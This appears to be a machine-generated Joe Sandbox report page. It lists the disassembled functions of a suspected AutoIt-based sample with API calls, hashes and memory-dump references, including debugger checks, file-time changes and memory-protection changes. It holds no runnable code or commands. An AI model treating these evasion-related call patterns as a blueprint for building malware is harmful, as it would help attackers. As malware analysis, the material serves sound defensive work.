Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 43074822e8364324c366b728482692f5c51a0dc9f6610e3d1a4f638244a33785
Instruction ID: 617e525efd6fd0215cd2399ca90d6cf5e02836d5212374fcf9164b07599804b4
Opcode Fuzzy Hash: 43074822e8364324c366b728482692f5c51a0dc9f6610e3d1a4f638244a33785
Instruction Fuzzy Hash: 0401DE31240B21EFE7513B78EC86AAE738B8F82761F101539F5069B382EE749D014A69

Function 006898A2 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00689548,?,?,?,?,?,00000004), ref: 006898BB
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00689548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 006898D1
CloseHandle.KERNEL32(00000000,?,00689548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 006898D8

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 984edd8c5cfcb4c7cdee43a64191c4dea6422ca9f85afe1b74265d5536eacb40
Instruction ID: 237b5005c78ec637e27f70c2ce33c9eeed0bb840da2ea39c07fab485c28ac451
Opcode Fuzzy Hash: 984edd8c5cfcb4c7cdee43a64191c4dea6422ca9f85afe1b74265d5536eacb40
Instruction Fuzzy Hash: EFE08632240214BBDB313B94EC09FDA7B5AAB07760F144221FB54691E087B129119BD9

Function 00688D0D Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00688D1B

Part of subcall function 00642D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00649A24), ref: 00642D69
Part of subcall function 00642D55: GetLastError.KERNEL32(00000000,?,00649A24), ref: 00642D7B

_free.LIBCMT ref: 00688D2C
_free.LIBCMT ref: 00688D3E

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction ID: 19073b72f6157b86c3bd1d831e93801bba71843a23933c05eddb933223a97924
Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
Instruction Fuzzy Hash: 6FE012A1A016024ACB64B678A940AD313DE8F9C392FA40A1DF40DD7286DE64FC828228

Function 0062A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 0065FC01

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 04278635728e7a35e766f4e51aebf37fd15d721b5dbd99f72033ccf73c7172ad
Instruction ID: 653ba0b983189342a21755959dcd047921fc3c10f64b46d73c07c1e8ee0b7a1d
Opcode Fuzzy Hash: 04278635728e7a35e766f4e51aebf37fd15d721b5dbd99f72033ccf73c7172ad
Instruction Fuzzy Hash: CB225670608B21DFDB24DF54D490A6AB7E2BF84304F14896DE88A9B362D771EC45CF86

Function 006247D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00624834

Part of subcall function 0064336C: __lock.LIBCMT ref: 00643372
Part of subcall function 0064336C: DecodePointer.KERNEL32(00000001,?,00624849,00677C74), ref: 0064337E
Part of subcall function 0064336C: EncodePointer.KERNEL32(?,?,00624849,00677C74), ref: 00643389

Part of subcall function 006248FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00624915
Part of subcall function 006248FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0062492A

Part of subcall function 00623B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00623B68
Part of subcall function 00623B3A: IsDebuggerPresent.KERNEL32 ref: 00623B7A
Part of subcall function 00623B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,006E52F8,006E52E0,?,?), ref: 00623BEB
Part of subcall function 00623B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00623C6F

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00624874

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 9a4a29ec9d92f0f9ba9b4bd087454b0e6993be3616476ffb3160aa80d5ea0400
Instruction ID: 1b2c0818f0a49f73f437a02875f9b4066f0af8f9bbbc7caf2d68c8b7012b197c
Opcode Fuzzy Hash: 9a4a29ec9d92f0f9ba9b4bd087454b0e6993be3616476ffb3160aa80d5ea0400
Instruction Fuzzy Hash: 7511DF718087A19FC700EF68E88580ABFEAEF99750F10891EF1418B2B1DB70D604CF96

Function 00625C99 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00625821,?,?,?,?), ref: 00625CC7
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00625821,?,?,?,?), ref: 0065DD73

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 583d4ce874bdef2e93dd94e49a8bf710bf2f241abd665600a440ff16674a38a5
Instruction ID: d042660b235150cdeccb12304f3a826a241de655075e18f2b8d5dae0b9e3951f
Opcode Fuzzy Hash: 583d4ce874bdef2e93dd94e49a8bf710bf2f241abd665600a440ff16674a38a5
Instruction Fuzzy Hash: 24018470284718BEF3301E24DC8AFB636DDAB01769F108319BAD59A2E0D6B45C49CF54

Function 00640DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0064571C: __FF_MSGBANNER.LIBCMT ref: 00645733
Part of subcall function 0064571C: __NMSG_WRITE.LIBCMT ref: 0064573A
Part of subcall function 0064571C: RtlAllocateHeap.NTDLL(01660000,00000000,00000001,00000000,?,?,?,00640DD3,?), ref: 0064575F

std::exception::exception.LIBCMT ref: 00640DEC
__CxxThrowException@8.LIBCMT ref: 00640E01

Part of subcall function 0064859B: RaiseException.KERNEL32(?,?,?,006D9E78,00000000,?,?,?,?,00640E06,?,006D9E78,?,00000001), ref: 006485F0

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: b05c410998f9cae429fdd1727996a7e300d94c6c301e43c4ae4db9c1495e5e36
Instruction ID: 85efb2d76d1933edb9145388143853d91f275441199cc1195d44c3b5daa33950
Opcode Fuzzy Hash: b05c410998f9cae429fdd1727996a7e300d94c6c301e43c4ae4db9c1495e5e36
Instruction Fuzzy Hash: ABF0A47190022AA6DB10BEA8EC219DE7BEE9F01311F10082EFA0496292DF709A9486D5

Function 006455FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0064562C
__lock_file.LIBCMT ref: 0064564D

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 2e6992d90879e38aa75cf8e9d52df6135063504821721812304379d401254f48
Instruction ID: 63a08cd6a681a0779b2f807870a5a5b3dcca370d1449ea71c463bd37374ff14a
Opcode Fuzzy Hash: 2e6992d90879e38aa75cf8e9d52df6135063504821721812304379d401254f48
Instruction Fuzzy Hash: FF01FC71C01A04EFCF51AFA88C064DE7B63AF52321F514119F8141B262DB318511DF55

Function 006453A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00648B28: __getptd_noexit.LIBCMT ref: 00648B28

__lock_file.LIBCMT ref: 006453EB

Part of subcall function 00646C11: __lock.LIBCMT ref: 00646C34

__fclose_nolock.LIBCMT ref: 006453F6

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: f92e061af294de62b4a76010d45d046dce902e14a12e73332f6086d0aa5be167
Instruction ID: a75bd8deb79e9fc797bc8fda98887e15e0eebc4887e7ffdf1a78df4b430d119d
Opcode Fuzzy Hash: f92e061af294de62b4a76010d45d046dce902e14a12e73332f6086d0aa5be167
Instruction Fuzzy Hash: CDF0F631C00A009FD7516F6488057ED6AE26F41374F20810CA421AB1C2DBBC49019B5A

Function 00628061 Relevance: 2.6, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,0062542F,?,?,?,?,?), ref: 0062807A
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,0062542F,?,?,?,?,?), ref: 006280AD

Part of subcall function 0062774D: _memmove.LIBCMT ref: 00627789

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ByteCharMultiWide$_memmove
String ID:
API String ID: 3033907384-0
Opcode ID: a53ad722048a1a59a843f64008a69662da8cd227db27aad6c90d78e369c613dd
Instruction ID: 4ecad36fa4d2672a0a5c56178f9836b91719db98ad5fd36dcf538459ad577e41
Opcode Fuzzy Hash: a53ad722048a1a59a843f64008a69662da8cd227db27aad6c90d78e369c613dd
Instruction Fuzzy Hash: 26018F31201514BEEB246B61EC46E7B3B6EEF85360F108029F905CE191DA30A8008A75

Function 016AE320 Relevance: 1.7, APIs: 1, Instructions: 187COMMON

Download Yara Rule

APIs

Part of subcall function 016ADB90: GetFileAttributesW.KERNELBASE(?), ref: 016ADB9B

CreateDirectoryW.KERNELBASE(?,00000000), ref: 016AE4D6

Memory Dump Source

Source File: 00000000.00000002.1513112394.00000000016AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16ad000_yqfze5TKW7.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: afdc99ca9369f4ce18c8300794182bcd48cab1edacfe03005bf0140a110456d6
Instruction ID: 5da077bcb4ef153c3e8c6870cbb99cb18d68f415acbfbf98299c4314c13f08ab
Opcode Fuzzy Hash: afdc99ca9369f4ce18c8300794182bcd48cab1edacfe03005bf0140a110456d6
Instruction Fuzzy Hash: 69719631A1060996EF14EFE4DC54BEEB33AEF98700F004469A509E7290F77A9E45CB69

Function 0062F290 Relevance: 1.7, APIs: 1, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0fd61a78c798348ffdddde4f4ff427481090f8433f5ef9ee94c3340ccc7c94d
Instruction ID: 1354edf836f7946c0b7adc40c994e5865c2757394412284022b183f6588093fa
Opcode Fuzzy Hash: c0fd61a78c798348ffdddde4f4ff427481090f8433f5ef9ee94c3340ccc7c94d
Instruction Fuzzy Hash: E961BD70600A1A9FCB10EF60D880AAAB7F6EF45300F14857DE90697382DB71ED41CF90

Function 00631FC3 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12847ea7b152954026b4f00930a5dc09715dda4aebabce3779fa8ab9995fe1d5
Instruction ID: 79723141e0daa22c58b2850f29ec771059ac4256bb1bc20a64d6cfb193e96541
Opcode Fuzzy Hash: 12847ea7b152954026b4f00930a5dc09715dda4aebabce3779fa8ab9995fe1d5
Instruction Fuzzy Hash: 7E518F31600A14AFCF54EF68D991EAE77A7AF85310F14816CF806AB392DB30ED05CB59

Function 00625AEE Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00625B96

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 8f856ae56128a6aa046aa14baff4b122dce8151c8b9cf942f4504875e2abd569
Instruction ID: bc61a54039fcc561720e8477da97aa6ed1549cbc3db71582c8762e785c9a19d7
Opcode Fuzzy Hash: 8f856ae56128a6aa046aa14baff4b122dce8151c8b9cf942f4504875e2abd569
Instruction Fuzzy Hash: DF315C71A00A25AFCB28DF6CD494AADB7B6FF44311F148629D81697710D770BD90CF91

Function 00640C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00640CB7

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 650b96cf7f6b7a4a8f8b94fe166782ae82308188674715cc4813a89efc446a3b
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 4A31C070A00115EBE718DF58D4C4AA9F7B6FB99300B6486A5E90ACB351DA31EDC2DBC0

Function 0065FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0065FCB7

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 36d0c1ee5037cf91492a1bb7174f6395f420721995f234faf5cbe5aaef479f52
Instruction ID: 1cfe8ab22770ac7eba9c563905ae5fae8942a71e4a6fdb365338184af58c5d7f
Opcode Fuzzy Hash: 36d0c1ee5037cf91492a1bb7174f6395f420721995f234faf5cbe5aaef479f52
Instruction Fuzzy Hash: 644137746087518FDB24DF64C444B5ABBE2BF45318F0989ACE9998B362C372EC45CF52

Function 006259B9 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00625A01

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: add3c4825caf0c21d0e851db6d6f1261a8d7ebaed7685699fe237621f6a90d46
Instruction ID: af6a0cdeb85c539fe64e4a717df15b7824fc06d1787b30eaf0594cf7e0ab5a61
Opcode Fuzzy Hash: add3c4825caf0c21d0e851db6d6f1261a8d7ebaed7685699fe237621f6a90d46
Instruction Fuzzy Hash: 5121D871D00E14EBDB209F51E84166A7BBFFF04312F2184AEE886D5550D770D4D4DB56

Function 0062C5A7 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 0062C5DD

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: _wcscmp
String ID:
API String ID: 856254489-0
Opcode ID: e80c5dca76de11aa3dbe5705973754d1f51bcfca02f7468da98b2d3984031ee5
Instruction ID: 4bcaea747fcb5f28fcb2db48e75fae78a3dc43eda1f96b4914e9887298049434
Opcode Fuzzy Hash: e80c5dca76de11aa3dbe5705973754d1f51bcfca02f7468da98b2d3984031ee5
Instruction Fuzzy Hash: FE11A535900968DBCB14EFA9EC41DEEB77AEF51360F14411AF811EB290DA709D05CFA4

Function 00624DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00624BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00624BEF

Part of subcall function 0064525B: __wfsopen.LIBCMT ref: 00645266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,006E52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00624E0F

Part of subcall function 00624B6A: FreeLibrary.KERNEL32(00000000), ref: 00624BA4

Part of subcall function 00624C70: _memmove.LIBCMT ref: 00624CBA

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512319217.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_yqfze5TKW7.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: deb2ba984f8831616f1ed231edb635e9657be15e12ead91718dfb03b5204bdb4
Instruction ID: 050b9239aad463899c53fbdfae097e535bb66e2e02a92acada79f1c2b29e917c
Opcode Fuzzy Hash: deb2ba984f8831616f1ed231edb635e9657be15e12ead91718dfb03b5204bdb4
Instruction Fuzzy Hash: FE112731600616ABDF20BFB0D802FAD77ABAF84750F10842DF981AB1C1DE719A019F55

Function 0065FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0065FD91

Memory Dump Source

Source File: 00000000.00000002.1512039058.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1512008625.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512182581.00000000006D4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1512261819.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
